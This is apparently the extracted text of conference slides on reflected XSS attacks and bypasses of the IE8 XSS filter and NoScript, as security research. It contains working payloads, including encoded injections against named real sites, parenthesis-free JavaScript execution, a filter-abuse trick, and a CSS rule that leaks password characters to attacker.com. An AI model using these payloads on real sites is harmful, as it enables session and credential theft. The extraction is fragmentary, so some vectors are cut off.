{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
Слайд 74
We will show the remaining 7 of our..
Top
10 reflected XSS attacks and how you can attack
with them.Bypassing the Filter
Слайд 75
Fragmented ?url='%20x=`&name=`%20onmouseover='alert(1)
DOM
based /index.php/alert(1)/
document.write("");
Inside event attributes ?id=alert(1)
onclick="deleteTopic($id)">Unfiltered Vectors – Top 4,5,6
Слайд 76 Reflected XSS means that the matched attack has
to be present in the HTML source code.
Strings that
were modified in the backendAttacks abusing charset peculiarities
Unicode Stuff Already Mentioned!
Attacks that are not reflected in the same page
https://www.dev.java.net/servlets/Search?mode=1&resultsPerPage=%22%27%2F%3E%3Cscript%3Ealert%28'Props+To+TheRat'%29%3C%2Fscript%3E&query=3&scope=domain&artifact=2&Button=Search
Props to ‘The Rat’ for finding the XSS on dev.java.net
Unfiltered Vectors – Top 7,8,9
Слайд 77 Attacks that are made to content not loaded
as HTML
Attack in 2 steps.
Demo fail
– Router bricked Unfiltered Vectors – Top 10
Слайд 78
Using CSS-only attacks
input[type=password][value^=a]{
background:"//attacker.com/log.php?hash[]=a";
}
input[type=password][value^=b]{
background:"//attacker.com/log.php?hash[]=b";
}…
Several XSS attacks are
possible with just CSS and HTML, check: “The Sexy
Assassin” http://p42.us/css
Слайд 82
Allowed by the filter:
clickme
So this wont be
detected (clickjacking):
link
Demo
http://search.cnn.com/search?query=aaa¤tPage=2&nt=%22%3E%3Ca%20href%3D%22%3Fquery%3Daaa%26currentPage%3D2%26nt%3D%2522%253E%253C%2573crip%2574%253E%2561lert%2528%2527Props%2520To%2520The%2520Rat%2527%2529%253C/%2573crip%2574%253E%22%3E%3Cimg%20style%3D%22cursor%3Aarrow%3Bheight%3A200%25%3Bwidth%3A200%25%3Bposition%3Aabsolute%3Btop%3A-10px%3Bleft%3A-10px%3Bbackground-image%3Atransparent%22%20border%3D0/%3E%3C/a%3E
Props to cesar cerrudo and kuza55
Props to
“The Rat” for the XSS on cnn.comSame Origin Exception + Clickjacking
Слайд 84
IE8 Blocks JS by disabling:
=
(
)
BUT It is possible
to execute code without () and =
{valueOf:location,toString:[].join,0:name,length:1}
We are limited
to attacks inside JS strings like:urchinTracker("//newOrder");
loginPage=“”;
Some JSON parsers passing a “sanitized” string to eval() may also be vulnerable to this same bypass.
Bypassing the JavaScript based Filter
Слайд 85
Other possible bypasses?
Require a certain context.
new voteForObama; //
executes any user-function without ( )
“:(location=name) // is not
detected (ternary operator // object literal)“?name:”// is not detected, modify string value, relevant on cases like:
location=“/redir?story=”;
“&&name// props to kuza55
“;(unescape=eval); // redeclare functions
Also props to kuza55!
JavaScript based Bypass
Слайд 86
Disabling scripts
Original code:
if(top!=self)top.location=location
Request:
?foobar=if
After filter:
if(top!=self)top.location=location
Demo! With.. Any webpage
Attacking with
the XSS Filter
Слайд 87
Attacking content-aware filters
Original code:
continueURI=“/login2.jsp?friend=”;
Request:
?foobar=continueURI
After filter:
continueURI=“/login2.jsp?friend=
onerror=alert(1)>”;
Attacking with the XSS Filter
Слайд 88
Why don't you detect fragmented attacks?
Performance, the
amount of permutations of each argument and possible vector
is of O(n!), that means that with 10 arguments you need 3628800 operations, and an attacker could just send thousands of arguments to DoS the filter, also this is not as common as other attacks.Why don't you detect DOM based attacks?
Compatibility (JSON probably) and Performance (hook all JS functions will slow IE even more.. if that's even possible), but it may be possible in the future.
Why don't you detect non-JS attacks like ?
Compatibility some websites are vulnerable to XSS by the way they work, and they need to use this elements.
Q&A with M$
Слайд 89
Why don't you detect attacks to Intranet?
The
Intranet zone pretty much by definition is a managed
environment, unlike the Internet. That means admins can set group policy to enable the filter in the Local Intranet zone, and also Intranet is only enabled by default on computers that are joined to a domain. -- David RossIf IE is protecting me against XSS, should I disable all anti-reflected-XSS protections I have?
YES Of course! please do it.
Q&A with M$ / continued
Слайд 90 Firefox -> Never! They have CSP and they
think that's all they need.
Firefox + NoScript -> Going
on a couple of years now! Opera, Safari -> No idea!
Chrome -> Maybe!
XSS Filters in Other Browsers?
Слайд 92
NoScript Advantages
Their users.
Security over usability (still very usable!).
Updates
every week/2 weeks.
Is NOT just a XSS filter.
Слайд 93 As any other filter, it's still possible to
bypass NoScript's rules, the following attack bypassed NoScript's rules:
z=“&”x=& onmousemove=t=Object(window.name);
({$:#0=t,z:eval(String(#0#).replace(/@/g,’’))}).z//>This was fixed last week, have you updated noscript?:
http://tinyurl.com/m4nfs9
Bypassing the Filter's Rules
Слайд 94
find a bypass 10 minutes before the talk!
if
I can't.. then.. it doesnt matter haha if I
can, notify giorgio haha<
This hasn't been fixed! Found 10m ago
Слайд 95
The DoS and pwn on NoScript (for bypassing)
The
following example:
http://victim.com/xss.php?hello=a-very-long-and-complicated-js-string&html_xss=alert ("pwned");
Will DoS NoScript, and then firefox will
kill it, and then your victim will be redirected to your "pwned" webpage.Hacking the Filter
Слайд 96 NoScript wont protect websites from attacking themselves, so
frames pointing to a redirect that sends to the
payload wont be detected by NoScript:Example: http://tinyurl.com/l5rnyc
http://www.google.com/imgres?imgurl=http://tinyurl.com/ZWZ8Z4&imgrefurl=http://tinyurl.com/ZWZ8Z4
and http://tinyurl.com/ZWZ8Z4 redirects to
https://www.google.com/adsense/g-app-single-1.do?websiteInfoInput.uri=ZWZ8Z4&contactInput.asciiNameInput.fullName=
